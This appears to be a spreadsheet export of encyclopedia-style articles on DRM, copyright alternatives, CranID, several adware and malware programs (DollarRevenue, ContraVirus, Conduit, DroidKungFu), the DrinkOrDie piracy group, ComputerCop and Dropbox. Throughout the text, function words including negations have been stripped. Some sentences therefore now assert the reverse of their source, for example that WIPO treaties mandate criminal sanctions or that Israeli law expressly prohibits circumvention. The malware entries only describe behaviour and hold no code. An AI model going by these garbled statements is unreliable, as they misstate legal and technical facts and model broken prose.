mechanisms laws world intellectual property organization supports world intellectual property organization copyright treaty (wct) requires nations enact laws circumvention. wipo internet treaties mandate criminal sanctions, merely requiring "effective legal remedies". china china's interim regulations ostensibly regulate digital content. china claims protect intellectual property rights, although world trade organization (wto) "determined china's copyright laws provide efficacy non-chinese nationals chinese citizens, required berne convention" "china's copyright laws provide enforcement procedures permit effective action infringement intellectual property rights". european union operates information society directive, wipo implementation. european parliament directed member states outlaw violation international copyright commercial purposes. punishments range fines imprisonment. excluded patent rights copying personal, non-commercial purposes. copyrighted games resold. circumventing game devices legal circumstances; protections cover technological measures interfere prohibited actions. india india signatory wipo copyright treaty wipo performances phonograms treaty. copyright provides protections digital content, criminalizing circumvention technical protections distribution illicit copies. punishment includes prison time. fair explicitly addressed. israel israel signatory wipo copyright treaty. israeli expressly prohibit circumvention technological protection measures. united states protections governed digital millennium copyright (dmca). criminalizes production dissemination technology lets users circumvent copy-restrictions. reverse engineering expressly permitted, providing safe harbor circumvention necessary interoperate software. open-source software decrypts protected content prohibited decryption done purpose achieving interoperability open source operating systems proprietary systems protected. dissemination software purpose violating encouraging others violate copyrights prohibited. dmca largely ineffective. cirumvention software widely available. however, wish preserve systems attempted restrict distribution development software, case decss. dmca contains exception research, although exception subject qualifiers created uncertainty community. cryptanalytic research violate dmca, although unresolved. notable lawsuits opposition faces widespread opposition. john walker richard stallman notable critics. stallman claimed using word "rights" misleading suggests word "restrictions", "digital restrictions management", replace this terminology adopted writers critics.other prominent critics include ross anderson, heads british organization opposes similar efforts elsewhere, cory doctorow. organizations freeculture.org opposed drm. foundation free information infrastructure criticized drm's effect trade barrier free market perspective.bruce schneier argues digital copy prevention futile: "what entertainment industry trying technology contradict natural law. they want practical make copying hard enough save existing business. doomed fail." described trying make digital files uncopyable like "trying make water wet".the creators starforce stated "the purpose copy protection making game uncrackable impossible." bill gates spoke 2006 ces, saying causes problems legitimate consumers. norwegian consumer rights organization "forbrukerrådet" complained apple 2007 company's drm, accusing unlawfully restricting users' access music videos, using eulas conflict norwegian consumer legislation. complaint supported consumers' ombudsmen sweden denmark, reviewed 2014. united states federal trade commission held hearings march 2009, review disclosure limitations customers' media products.valve president gabe newell stated, "most strategies dumb" decrease value game consumer's eyes. newell suggested goal instead "[creating] greater value customers service value". valve operates steam, online store games, well social networking service platform.at 2012 game developers conference, projekt red, marcin iwinski, announced company would drm. iwinski stated drm, "it's over-complicating things...the game....is cracked hours." iwinski added "drm protect game. examples does, people maybe consider complications legit users."the association computing machinery institute electrical electronics engineers opposed drm, naming aacs technology "most likely fail" issue ieee spectrum. public licenses general public license version released free software foundation, provision "strips" legal value, people break software without breaking laws dmca. 2006, launched "defective design" campaign drm.creative commons provides licensing options encourage creators work without drm. creative commons licenses anti-drm clauses, making licensee breach licenses' baseline rights. drm-free works many publishers artists label works "drm-free". major companies done include apple, comixology, gog.com, books vimeo demand. shortcomings availability many systems require online authentication. whenever server goes down, territory experiences internet outage, locks people registering using material. this especially true products require persistent online connection, where, example, successful ddos attack server essentially makes material unusable. usability compact discs (cds) schemes standards-compliant, labeled cd-roms. cd-roms cannot played players personal computers. performance certain systems associated reduced performance: games implementing denuvo anti-tamper performed better without drm. however, march 2018, gamer tested final fantasy performance effects denuvo, found cause negative gameplay impact despite little increase loading time. robustness copy-prevention schemes never wholly secure since logic needed decrypt content present either software hardware implicitly hacked. attacker extract information, decrypt copy content, bypassing drm.satellite cable systems distribute content widely rely hardware systems. such systems hacked reverse engineering protection scheme. analog hole audio visual material (excluding interactive materials, e.g., video games) subject analog hole, namely order view material, digital signal must turned analog signal. post-conversion, material copied reconverted digital format. analog hole cannot filled without externally imposed restrictions, legal regulations, vulnerability inherent analog presentation. conversion digital analog back reduces recording quality. hdcp attempt plug analog hole largely ineffective. consumer rights ownership restrictions opponents argue violates private property rights restricts range normal legal user activities. component found digital audio player restricts acts regard certain content, overriding user's wishes (for example, preventing user copying copyrighted song part compilation). doctorow described "the right make copyright laws".windows vista disabled degraded content play used protected media path. restricts right make personal copies, provisions lend copies friends, provisions service discontinuance, hardware agnosticism, software operating system agnosticism, lending library use, customer protections contract amendments publisher, whether content pass owner's heirs. obsolescence when standards formats change, drm-restricted content become obsolete. when company undergoes business changes bankruptcy, previous services become unavailable. examples include music, yahoo! music store, adobe content server adobe pdf, acetrax video demand. piracy laws widely flouted: according australia official music chart survey, copyright infringements causes practised millions people. according eff, effort attract customers, music services obscure restrictions impose clever marketing." economic implication trade-offs control sales jeff raikes, ex-president microsoft business division, stated: they're going pirate somebody, want rather somebody else". analogous argument made early paper kathleen conner richard rummelt. subsequent study digital rights management e-books oestreicher-singer arun sundararajan showed relaxing forms beneficial rights holders losses piracy outweighed increase value legal buyers. even unbreakable, pirates still might willing purchase, sales might increase.piracy beneficial content providers increase consumer awareness, spreading popularizing content. this also increase revenues media, live performances. mathematical models suggest schemes fail multiple levels. biggest failure burden poses legitimate customer reduces customer's willingness buy. ideal would inconvenience legal buyers. mathematical models strictly applicable music industry. alternatives several business models offer alternatives. subscription streaming services created profitable business models signing users monthly subscriptions return unlimited content. this model worked music (such spotify, apple music, etc.) video (such netflix, disney+, hulu, etc.) "easy cheap" accessing pirated copy illegal possibly inconvenient. businesses charge acceptable fees attract customers. first business model dissuades illegal file sharing make legal content downloading easy cheap. pirate websites often host malware attach files. content provided legitimate sites reasonably priced, consumers likely purchase media legally. crowdfunding pre-order crowdfunding used publishing model digital content. promotion traditional products many artists give away individual tracks create awareness subsequent album. artistic freedom voucher artistic freedom voucher (afv) introduced dean baker consumers support "creative artistic work". system, consumer receives refundable credit $100 give artist creative work. restrict fraud, artists must register government. voucher prohibits artist receives benefits copyrighting material certain length time. consumers would allowed obtain music certain amount time easily consumer would decide artists receive $100. money either given artist many, distribution consumer. also anti-tamper software closed platform digital asset management hardware restrictions license manager odrl software metering software protection dongle secure digital music initiative trusted computing references further reading external links news technology q&amp;a: what drm? copyright community computer networks richard stallman windows media wayback machine (archived december 2010) microsoft microsoft research talk, cory doctorow itunes, competition reckon digital rights management wayback machine (archived march 2008) cen/isss (european committee standardization information society standardization system). contains range possible definitions various stakeholders. september 2003 game piracy examined article investigating effects piracy video game industry drm.info information chaos computer club, defective design, electronic frontier foundation, free software foundation europe, organisations.</t>
  </si>
  <si>
    <t>Copyright alternatives</t>
  </si>
  <si>
    <t>various copyright alternatives alternative compensation systems (acs) proposed ways allow widespread reproduction digital copyrighted works still paying authors copyright owners works. this article discusses proposals involve form government intervention. other models, street performer protocol voluntary collective licenses, could arguably called "alternative compensation systems" although different generally less effective solving free rider problem. impetus proposals come widespread peer-to-peer file sharing networks. authors argue simply practical response situation. advocates further, holding file sharing fact greatly beneficial, levy funded systems actually desirable tools paying artists sales coupled copy prevention technologies. artistic freedom voucher artistic freedom voucher (afv) proposal argues current copyright system providing state enforced monopoly leads "enormous inefficiencies creates substantial enforcement problems". under proposed system, individuals would allowed contribute refundable credit approximately $100 "creative worker", contribution would voucher used support artistic creative work. recipients contribution would turn required register government similar fashion religious charitable institutions tax-exempt status. sole purpose registration would prevent fraud would evaluation quality work produced. alongside registration, artists would also ineligible copyright protection period time years example) work contributed public domain allowed freely reproduced. would affect creative workers ability receive funds live performances. proponents claim system could create billion annually artists, greater currently flows copyrighted material. $100 adult voucher, 500,000 writers, musicians, singers, actors, creative workers could paid $40,000 year. baker also states realistic assume savings reduced expenditures copyrighted work would vastly exceed cost afv. majority savings would come individuals deciding supported work place copyrighted work well lower advertising costs material would public domain. copyright enforcement demand would also decrease material increased. assumptions made direct costs public copyrighted material would reduced around percent high percent. over time also likely savings would increase lesser costs system brighter prospects.in 2010 article critical proposal, graphic designer mark stanley writes: "like school vouchers, flat tax, pretenders, assumes necessity state intervention, tries bend liberty around strictures. freedom isn’t forgiving manipulation." donation-based record labels while systematic restructuring copyright laws proposed practice, concept paying artists donations tested, success. 2006, musician jeff rosenstock founded quote unquote records, advertised first donation-based record label. artists label make music available download free, invite listeners make small donation want between donations ticket sales live shows, quote unquote records successfully recording music expanding number bands label past twelve years. architectural details where money come proposals included targeted levies internet connections, blank cds, digital media players, etc. (many goods levied various countries' existing private copying schemes); income taxation; optional payments users. terms economic theory, consumer "opt regimes different universal ones, depending scheme administered, differences might large. example, default option subscribers surcharge, could avoided filing signed commitment make unauthorised downloads networks, effects might quite similar. this scheme however unsuitable business owners maintain free internet connections incentive customers. would responsibility business owner monitor customer's internet use. where various proposals made base distribution royalties measures consumer downloading, usage voting. computer security issues addressed collecting data considerable. privacy verifiability obstacles similar encountered internet voting; soluble, hardware assistance currently available ordinary pcs. practical deploy short term would collect statistical samples much smaller population. actual distribution royalties would likely carried copyright collecting society. advantages disadvantages alternative compensation systems significant advantages digital copyright. they impose artificial scarcity copyright works: everyone download many songs, ebooks films want economic terns, eliminate deadweight loss copyright monopolies). they also avoid high technological social costs digital copyright enforcement. greatest drawbacks acses excess burden taxation collected, need decide tax/levy rates system (although methods contingent valuation help little question). alternative compensation systems practice canada's private copying levy unforeseen result temporarily creating kinds downloading. doe, dictum suggested also apply uploading; dictum criticised appeal. france, december 2005 dadvsi amendments passed senate would created called "global license". these amendments removed bill finally became law. 2009, german social democratic party added proposal variant called "cultural flat-rate" party platform. also anti-copyright notice copyright abolition criticism copyright free-culture movement free software license free content license freedom information information wants free steal this film zeitgeist (film series)#zeitgeist: addendum zeitgeist (film series)#zeitgeist: moving forward television licensing united kingdom, effect annual flat-tax united kingdom, funds references bibliography baker, artistic freedom voucher: internet alternative copyrights archived 2019-12-15 wayback machine 2003. copley, "put dime heavenly jukebox", multimedia entertainment online news (701), 2001. eckersley, virtual markets virtual goods: mirror image digital copyright? harvard journal technology 2004. fisher, w.w. promises keep: technology, future entertainment, stanford univ. press 2004. gervais, "the price social norms: towards liability regime file sharing", journal intellectual property 2004. liebowitz, alternative copyright systems: problems compulsory license, presented serciac 2003. love, artists want paid: blur/banff proposal 2002 netanel, n.w. impose noncommercial levy allow free peer-to-peer file sharing harvard journal technology 2003. stallman, r.m. right d.a.t, wired, 1992. external links additional references available alternative compensation systems (acs)</t>
  </si>
  <si>
    <t>Cranid</t>
  </si>
  <si>
    <t>cranid created 1992 anthropologist richard wright university sydney infer probable geographic origin unknown crania found archaeological, forensic repatriation cases. wright created program establish uniformity cranial morphology based assumption high correlation geographical location cranial morphology. this first standardized program evaluate similarity dissimilarity cranial morphological characteristics unknown cranium database. software cranid free software program utilizes multivariate linear discriminant analysis nearest neighbor discriminant analysis conjunction cranial measurements assess geographic origin, used infer ancestry unknown cranium. cranid compares unknown cranium geographic samples, 3,163 crania different populations.the measurements landmarks used program compare unknown cranium database consist glabello-occipital length, nasio-occipital length, basion-nasion length, basion-bregma height, maximum cranial breadth, maximum frontal breadth, biauricular breadth, biasterionic breadth, basion-prosthion length, nasion-prosthion height, nasal height breadth, orbit height breadth, bijugal breadth, palate breadth, bimaxillary breadth, zypomaxillary subtense, bifrontal breadth, nasio-frontal subtense, biorbital breadth, interorbital breadth, cheek height, frontal chord, nasion-bregma subtense (frontal subtense), parietal chord, bregma-lambda subtense (parietal subtense), occipital chord lambda-opisthion subtense (occipital subtense). each cranial measurement definitions taken w.w. howells' data set. data program compares unknown crania geographical samples 3,163 crania different populations around world. starting point database w.w. howells' 1973 study cranial variation 2,524 crania populations around world. added howells’ data measurements beduin crania provided martha lahr. robert krusynski london’s natural history museum provided measurements poundbury romano-british century site), iron palestine, post-medieval italy, indian subcontinent. raghavan bulbeck provided measurements punjab area indian subcontinent. wright added measurements samples patagonia, medieval london, neolithic denmark, aboriginal sample sydney area (with permission perouse aboriginal land council metropolitan local aboriginal land council). cranid runs windows. package, including manual, downloaded self-extracting file from: https://app.box.net/shared/h0674knjzl after downloading, create folder, example c:\cranid. copy downloaded file (current version cr6bind.exe) folder. double click file unpack read opening pages manual going. uses this program used determine geographical origin skeletal remains archaeological forensic contexts. geographical origin program author program, many crania included data set, program mainly used australian british bioarchaeologists forensic anthropologists. forensic anthropologists software determine ancestry unknown skeletal remains, medico-legal contexts. program designed forensic anthropologists determination biological profile, includes factors age, sex, stature race. this biological profile used determine personal identification skeletal remains crime scenes, plane accidents, mass disasters.bioarchaeologists program forensic anthropologists, archaeology context. determining ancestry archaeological context allows researcher build information skeletal remains found archaeological burials, aids development knowledge culture practices customs. this program also used many bioarchaeologists conduct distance studies skeletal remains, comparing craniometric measurements found archaeological remains craniometric measurements known skeletal remains medical legal institutions. criticisms although maker cranid explicitly state program infer ‘race’, many forensic anthropologists program, others like determine race unknown individual, even though many biological anthropologists criticized concept. study conducted cranid program found program "supposed allocate individual skull specific population rather ‘major race’," program generate persuasive allocations individual crania geographical population.another criticism fact many measurements essential program subject interobserver error intraobserver error. measurements researchers vary substantially size degree variation measurements striking effect results cranid. potential error, results cranid taken account assessing accurate findings formed cranid are.although combined data cranid utilizes includes many geographical regions, still many regions accounted data set. according fenja theden-ringl colleagues, cranid another forensic anthropology software program, fordisc, unable place skeletal remains site found arnhem land, northern territory australia. researchers believe programs unable accurately assign skeletal remains group programs lacking indonesian data databases used programs. also forensic anthropology biological anthropology biocultural anthropology bioarchaeology bone clones osteoware fordisc references further reading cross, pamela wright, "the nikumaroro bones identification controversy: first-hand examination versus evaluation proxy-- amelia earhart found still missing?" journal archaeological science: reports. volume pages 52–59, september 2015 navajo, david, catarina coelho, ricardo vicente, maria teresa ferreira, sofia wasterlain, eugenia cunha. "ancestrees: ancestry estimation randomized decision trees". international journal legal medicine. volume 129, july 2014. lockyer, nicholas. assessment utility, analysis potential geometric morphometrics ancestry determination skull." axis, volume issue summer 2010. https://web.archive.org/web/20151124173235/https://ojs.lifesci.dundee.ac.uk/index.php/axis/article/viewarticle/62 external links cranid richard wright william howell's craniometric data</t>
  </si>
  <si>
    <t>DollarRevenue</t>
  </si>
  <si>
    <t>dollarrevenue adware program made company name. displays advertisements infected installs ucmore toolbar track internet searches. usually comes bundled another program. december 2007, dutch government agency opta fined unnamed individuals three companies million euro infecting million computers worldwide.in june 2013, dutch corporate appeals court (cbb) overturned around million euro worth fines imposed opta dollarrevenue. said opta adequately establish happened infected pcs. references external link spyware guide</t>
  </si>
  <si>
    <t>ContraVirus</t>
  </si>
  <si>
    <t>contravirus rogue spyware application poses legitimate anti-spyware program. application uses false scanner force computer users removal non-existent spyware items. also known expertantivirus. methods infection contravirus downloaded trojan horse, along possible software. typically, installed smitfraud trojan. symptoms infection contravirus known display fake messages stating user's computer infected spyware. also install file wincom27.dll, located c:\windows\ ext32inc.dll located c:\windows\system\, order persuade user purchase software. traditionally, user contravirus running "scan" computer time user prompted purchase contravirus software order remove threat. also hijack user's browser install toolbar.95, server 2000, 2000, server 2003, vista, server 2008, server 2008 operating systems capable becoming infected. removal removal contravirus difficult require assistance qualified support personnel. however, users success removing program using smitfraudfix.zip program, well known programs kaspersky anti-virus, spybot search destroy, norton family security products. also malware references external links symantec security f-secure www.frsirt.com www.xp-vista.com</t>
  </si>
  <si>
    <t>Conduit toolbar</t>
  </si>
  <si>
    <t>conduit toolbar online platform allowed publishers create custom toolbars, apps, mobile apps cost. developed conduit inc. demerged perion network. conduit approximately 260,000 registered publishers collectively created content downloaded million users. apps pieces content developed conduit's platform distributed exchanged online conduit marketplace. currently, million users consume apps marketplace daily basis.conduit's toolbars described online forums news outlets malware difficult remove. browser hijacking rootkit capabilities. conduit began shift away part business late 2013 spun toolbar division perion network reverse merger. after deal, conduit shareholders still owned perion's existing shares, though perion conduit remain independent companies. history 2010 conduit then-president adam boyden featured forbes magazine online, discussed link successful social gaming marketing principles. 2010 million toolbars powered conduit used least month, conduit google's list 1,000 sites internet year. 2011, conduit completed million acquisition israeli startup wibiya, engagement platform enables publishers integrate variety applications site wibiya product.during time conduit moved away toolbar part business order focus mobile browser engagement offerings. ingrid lunden techcrunch wrote spinning client connect business, "split divided company two, part focusing mobile engagement business shilo, other, client connect, merging perion". lunden said that, "less month browser-toolbar mobile startup conduit merged client connect division perion, company making another change business. conduit announced discontinuing wibiya, social browser toolbar service acquired 2011 million, shifts away toolbar business." late 2013 conduit valued $1.5 billion. technology browser until 2013, conduit's main businesses revolved around downloadable toolbars. conduit allowed publishers create distribute toolbars browsers. typically toolbars installed another software product toolbar piggyback program, users given option install toolbar. browsers initially supported toolbars included internet explorer, firefox, safari. google chrome added supported browser 2011. conduit uses microsoft bing provide search results user. examples toolbars included zynga-designed toolbar helps farmville enthusiasts keep up-to-date status game, another toolbar ebay provides auction updates. content customized individual toolbar rather generalized users. toolbar also used general information distribution well, used companies engage marketing campaigns. other companies developed conduit toolbars include major league baseball, greenpeace, lufthansa. some companies brands used conduit's platform major league baseball, time warner cable, news, zynga, chelsea football club, groupon, travelocity, μtorrent, weather channel. toolbars described online forums news outlets browser hijack difficult remove. said conduit's revenue comes paid referrals search engine.conduit toolbars automatically downloaded alongside certain freeware order provide publisher monetization. conduit toolbars rootkit capabilities hook toolbar deep operating systems perform browser hijacking. many conduit removal tools also considered malware themselves. while virus, program referred "potentially unwanted program" computer industry. references</t>
  </si>
  <si>
    <t>Draft:Serenity Shield (Fintech Crypto Solution)</t>
  </si>
  <si>
    <t>serenity shield blockchain solution geared towards protection digital assets event lost wallet seed secret phrase, personal tragedy, death. native cryptocurrency token sersh. references</t>
  </si>
  <si>
    <t>DrinkOrDie</t>
  </si>
  <si>
    <t>drinkordie (dod) prestigious underground software piracy group warez trading network 1990s. december 2001 major enforcement raid known operation buccaneer forced close criminal charges infringement. dod, rule, received financial profit activities. network primarily consisted university undergraduates also supported software company employees, leaked copies software digital media. also actively involved illicit file-trading networks. history start trading drinkordie founded 1993 moscow russian handle "deviator" "jimmy jamez" friend went code name "cyberangel." 1995, group global jimmy jamez leader. following years, group's founders stepped aside replaced multiple council members russians. millennium, drinkordie leaders council members united states, australia israel. earliest major accomplishments internet release windows weeks microsoft released official version. also known speed ripper released 1999 shortly decss. drinkordie biggest important software related group demo scene 2001's operation buccaneer. member raids 2001 group busted u.s. customs operation called operation buccaneer. global raids initiated information given united states customs james cudney, known bcrea8tiv. cudney quickly rose ranks council spent many years working undercover customs, logging conversations chat rooms channels visited irc. also carried undercover operations france, prior arrests collecting detailed information members members online warez groups. e.g., screenames, locations, nationalities. time, drinkordie allegedly leaders, united states another australia. warez scene reacted surprised bust windows leak last major release since 1995. australia co-leader raymond griffiths, known handle "bandido", british national long-term australian resident bateau central coast south wales. charged 2003 copyright infringement conspiracy commit copyright infringement legislation. fought extradition years, arbitrarily detained australia time.griffiths ultimately unsuccessful early february 2007, extradited pleaded guilty april 2007 count conspiracy commit criminal copyright infringement count criminal copyright infringement. june 2007 griffiths sentenced months prison conspiracy commit copyright infringement. district court judge, claude hilton, took account almost three years griffiths spent australian jails fighting extradition, meaning served months jail. result operation buccaneer, uk's national hi-tech crime unit also arrested members living britain. 9-month trial starting september 2004 central criminal court bailey convicted conspiracy defraud software companies institutions. sentences convicted ranged house arrest months prison. elsewhere apart griffiths british defendants, others implicated swedish, german, norwegian, italian finnish nationals. except griffiths dealt copyright fraud laws country. griffiths member international network extradited this important benchmark copyright enforcement department justice. activity prosecutors allege drinkordie released application utility programs november 2000 december 2001, worth us$1 million time. leech sites grew terabyte, 15,000 titles. references external links official webpage defunct drinkordie webpage. free rothberg zdnet article regarding members standing trial. 'bandido' software pirate arraigned u.s. charges, information week, february 2007. drinkordie warez ringleader cops piracy charges, technica, april 2007</t>
  </si>
  <si>
    <t>DriveCleaner</t>
  </si>
  <si>
    <t>DriveSentry</t>
  </si>
  <si>
    <t>drivesentry antivirus program, developed drivesentry inc, protect microsoft windows users malware. available free personal (non commercial) use, though restricted functionality. detection methods drivesentry provides realtime demand virus scanner, uses following methods determine application contains virus allowing run: whitelisting: programs first checked list known trusted validated applications files. these "whitelisted" files allowed without restriction. blacklisting: only programs present whitelist checked updated database list virus signatures; files whose signature list automatically moved quarantine area attempt gain access system data. this technique used practically antivirus products first line defense. heuristics programme either list behavior compared previous encountered malware. community statistics: drivesentry also collects stores user statistics based access decisions made user, shared amongst users.drivesentry partners offensive computing frame4 security services collect analyze malware samples database list, partnering ensures database multiple sources therefore offers redundancy. although drivesentry's basic features available free, advanced features automatically updating white blacklists paid one-off payment. white/blacklisting articles computing publications discussing malware protection technologies whitelisting claim traditional antivirus technologies increasingly hard time keeping latest virus, trojans malicious threats. popularity internet ease data spread, allows threats propagate faster, requiring traditional antivirus products play "catch-up" zero threats. techniques using white/blacklisting community feedback, offer greater securityhowever, functionality come cost specifically, whitelisting allows pre-vetted software executed, prevents software running, even harmless. drivesentry avoids issue allowing user prompted programs appear black whitelist. this forces responsibility user determine good bad. drivesentry attempts help user monitoring action program calculating displaying threat rating. furthermore, malicious software included whitelist still executed. references external links "official drivesentry website". archived original july 2011.</t>
  </si>
  <si>
    <t>DroidKungFu</t>
  </si>
  <si>
    <t>droidkungfu malware affects android primarily targets users china. first evidence malware found android market march 2011. history droidkungfu discovered us-based researchers yajin zhou xuxian jiang. discovered malware working north carolina state university. targets android platform allows hackers access control devices. droidkungfu malware collect user data backdoor hacking. process droidkungfu malware droidkungfu encrypts different root exploits: udev exploit "rageagainsthecage" exploit, break android security. once executed, decrypts exploits communicates remote server without user knowledge. function silent mobile device rooting unlocks system files functions installs without user interaction data collected imei number phone model android version network operator network type information stored phone card memory also botnet command control (malware) denial-of-service attack file binder shedun trojan horse zombie (computer science) zeus (malware) references</t>
  </si>
  <si>
    <t>ComputerCop</t>
  </si>
  <si>
    <t>computercop (stylized computercop) content control software developed bohemia, york-based company computercop software. software offers ability users scan content computer (such files, images, video, browser history) objectionable content, along logging component allows parents notified certain words typed. upon original release, software endorsed nypd detective dietl, originally branded dietl's tough computer reference autobiographal film tough cop). initially contained scanning software; later versions dropped dietl's endorsement branding, also added keylogger.the software, intended promote children's internet safety, generally sold public, sold directly local enforcement agencies police departments bulk custom branding endorsements, distributed public charge form outreach. software gained infamy october 2014 following release report electronic frontier foundation, non-profit digital rights group, alleged computercop privacy-invasive number security flaws, including storage transmission logging output non-encrypted format. reports resulted varying responses agencies planned distributed software, although continued endorse software public safety benefits. operation computercop distributed cd-rom, consists software components; content scanner, logger. scanner directly performs scan system's hard drive files containing objectionable content, user's browsing history objectionable websites. while scan content file names documents keywords relating content, cannot scan content images themselves.the software comes second component known "keyalert", designed monitor websites online chat services; installed computer, scans logs keyboard input computer's user, searching logging strings related objectionable content user-specified keywords. also provide e-mail notifications whenever activity detected. logged data stored computer's hard drive; windows version, stored unencrypted plain text. version encrypt logging data password. distribution computercop software marketed directly district attorneys enforcement agencies semi-white-label product. packaging branded agency's logo, introductory video featuring official agency played upon insertion disc—either provided agency itself, filmed computercop software. software purchased bulk agency, distribute software free members public outreach campaign children's internet safety. developers also touted offering software could help provide agency "positive media attention", also "election fundraising tool". software marketed directly consumers, although surplus copies exist sale online. reception october 2014, electronic frontier foundation released report considering computercop software spyware number major design flaws—particularly within logging system. condemned agencies that, according public records materials obtained foundation, distributed computercop, using knowingly using public funding purchase distribute insecure surveillance software general public.the consider scanning portion software adequately effective large number false positives, lack support browsers internet explorer safari, along inability distinguish application data files user files, scan contents image files themselves. more significantly, logger criticized storing logged data non-encrypted plain text user's hard drive, including passwords sensitive information. also found insecure connection used transmit data third-party server generate e-mail notifications; data could easily intercepted public wi-fi hotspot using packet analyzer software. computercop head stephen delgiorno denied major problems software, stating software "doesn't give sexual predators identity thieves access children's computers", "works existing email internet access services computer user already engaged", noted would update privacy policy indicate store user information.the also noted several questionable claims made computercop's distributors promotional material; company distributed letter raymond dineen, former director treasury executive office asset forfeiture, endorsed software "valid crime protection tool", specified purchase software acceptable equitable sharing funds. delgiorno claimed letter, undated, 2001, certain elements (such letterhead, re-created) modified presentation purposes. attempted request original copy letter treasury department, department unable locate shortly afterward, treasury department issued fraud alert believing document falsified. promotional material computercop also found contain endorsements american civil liberties union national center missing exploited children. aclu denied endorsed software, ncme stated 1998, gave permission computercop include endorsement, year.following reports, diego county district attorney's office issued warning advising using logging features computercop software; however, district attorney bonnie dumanis (who endorsed software) still stated "the benefits software protecting children predators bullies online providing parents effective oversight tool outweigh limited security concerns product, fixed." steve moawad, senior deputy district attorney contra costa county, california, similarly noted "overstat[ed] risk" computercop, identity theft cases connection software.after announced purchase distribution 5,000 copies computercop days prior report, limestone county sheriff mike blakely defended software disputed electronic frontier foundation's actions, describing group non-credible "ultra-liberal" organization "more interested protecting predators pedophiles protecting children." also argued technology provided computercop could helped prevent columbine high school massacre. statements technology website technica, blakely stated proper software "something whole-heartedly endorse", persuasion people would rather anything, that's something can't help."in september 2016, treasury department completed investigation, confirming distributors "altered 2001 letter teoaf made appear blanket permission enforcement agencies equitable sharing funds purchase software", cannot prosecuted statute limitations. also internet security list content-control software comparison antivirus software comparison firewalls state connecticut julie amero references external links official website remove computercop windows</t>
  </si>
  <si>
    <t>Dropbox</t>
  </si>
  <si>
    <t>dropbox file hosting service operated american company dropbox, inc., headquartered francisco, california, u.s. offers cloud storage, file synchronization, personal cloud, client software. dropbox founded 2007 students drew houston arash ferdowsi startup company, initial funding seed accelerator combinator.dropbox experienced criticism generated controversy issues including security breaches privacy concerns.dropbox blocked china since 2014. concept dropbox brings files together central place creating special folder user's computer. contents folders synchronized dropbox's servers computers devices user installed dropbox, keeping files up-to-date devices. dropbox uses freemium business model, users offered free account storage size, paid subscriptions available offer capacity additional features. dropbox basic users given gigabytes free storage space. dropbox offers computer apps microsoft windows, apple macos, linux computers, mobile apps ios, android, windows phone smartphones tablets. march 2013, company acquired mailbox, popular email app, april 2014, company introduced dropbox carousel, photo video gallery app. both mailbox carousel shut december 2015, features apps implemented regular dropbox service. october 2015, officially announced dropbox paper, collaborative document editor. history dropbox founder drew houston conceived dropbox concept repeatedly forgetting flash drive student mit.houston founded evenflow, inc. 2007 company behind dropbox, shortly thereafter secured seed funding combinator. dropbox officially launched 2008's techcrunch disrupt, annual technology conference. owing trademark disputes proxy, inc. evenflow, dropbox's official domain name "getdropbox.com" october 2009, acquired current domain, "dropbox.com". october 2009, evenflow, inc. renamed dropbox, inc.in interview techcrunch's "founder stories" october 2011, houston explained demo video released dropbox's early days, viewer arash ferdowsi. ferdowsi impressed" formed partnership. regards competition, houston stated easy explain idea, actually really hard it." user growth dropbox steady user growth inception. surpassed million registered users milestone april 2009, followed million september, million november. passed million users october 2011, million november 2012, million 2016, million 2021. acquisitions july 2012, dropbox acquired tapengage, startup "enables advertisers publishers collaborate tablet-optimized advertising". following december, dropbox acquired companies; audiogalaxy, startup "allowing users store music files playlists cloud stream device", snapjoy, company allowed users "aggregate, archive view digital photos cameras, phones popular apps like flickr, instagram picasa, view online app". july 2013, dropbox acquired endorse, "mobile coupon startup".in 2014, dropbox acquired bubbli, startup "built innovative ways incorporating technology views, packaging mobile app".in january 2015, dropbox acquired cloudon, company provided mobile applications document editing creation. time, dropbox told techcrunch cloudon's base herzliya would become first dropbox office israel. july, dropbox acquired clementine, enterprise communication service.in april 2014, dropbox acquired photo-sharing company loom (which would shut integrated then-recently announced carousel), document-sharing startup hackpad. dropbox later announced april 2017 hackpad would shut july notes migrated dropbox paper.in january 2019, dropbox acquired e-signature company hellosign. acquisition reported dropbox's largest date, reported $230 million.in march 2021, dropbox announced acquisition docsend. docsend offers secure document sharing analytics product. 2021 workforce reduction january 2021, dropbox houston announced layoff employees, approximately percent current workforce. company said reductions necessary order focus company team structure focus level priorities. software firm also announced olivia nottebohm would leaving company february 2021. platforms dropbox computer apps microsoft windows, apple macos, linux computers, mobile apps ios, android, windows phone smartphones tablets. also offers website interface. part partnership microsoft, dropbox announced universal windows january 2016.dropbox's apps offer automatic photo uploading feature, allowing users automatically upload photos videos cameras, tablets, cards, smartphones dedicated "camera uploads" folder dropbox. users given megabytes extra space uploading first photo, given gigabytes extra space users continue using method photos.in july 2014, dropbox introduced "streaming sync" computer apps. streaming sync described "supercharged" synchronization speed large files improves upload download time times.in august 2015, dropbox announced availability "universal factor" security keys, providing two-factor authentication logging services. system requirements dropbox windows dropbox windows requires: windows 8.1, standard mode) ntfs-formatted hard drive processors (except mode) latest dropbox windows mode dropbox windows mode requires: windows redstone update (1703) later dropbox microsoft store processors supported mode application latest dropbox linux dropbox linux requires: ubuntu 14.04 later fedora later glibc 2.19 later latest dropbox linux computer formatted following file systems: ext4 64-bit systems only) ecryptfs (back ext4) 64-bit systems only) btrfs iphone ipad dropbox iphone ipad requires: latest dropbox later dropbox requires: yosemite 10.10 later macos sierra, experience different latest dropbox android dropbox android requires: android later latest dropbox financials dropbox received initial funding seed accelerator combinator. dropbox also raised us$1.2 million series funding sequoia capital 2007, "along interest amount) converted equity part series investment, included fresh slug us$6 million", bringing total amount us$7.25 million, round closed 2008 documents filed 2009.a 2010 report wall street journal said "since [founder drew houston] started reading eric ries' lean startup blog year ago, company started trickling features ready instead waiting launch fully featured product. that helps test customer appetite, says, dubbing practice "minimum viable product".techcrunch reported july 2011 dropbox looking raise us$200 us$300 million, valuation billion billion range. [...] quite step previous funding rounds totalled tiny $7.2 million". noted forbes article, dropbox "revenue track $240 million 2011".in april 2012, dropbox announced bono edge, members irish rock band individual investors company.in 2014 dropbox raised financing blackrock inc. others values company billion. march 2017, bloomberg reported dropbox secured us$600 million credit line, company expected file initial public offering (ipo) soon year".in february 2018, dropbox filed listed nasdaq. company's initial intent raise $500 million. dropbox's stock rose percent $29.89 first trading march 2018.as february 2021, dropbox profitable last three quarters, whilst also debt. business model dropbox uses freemium business model, users offered free account storage size, paid subscriptions available offer capacity additional features. accordingly, dropbox's revenue product many users convert paid services.dropbox basic users given gigabytes free storage space. this expanded referrals; users recommend service people, people start using service, user awarded additional megabytes storage space. dropbox basic users earn gigabytes referral program.the dropbox plus subscription (named dropbox prior march 2017) gives users 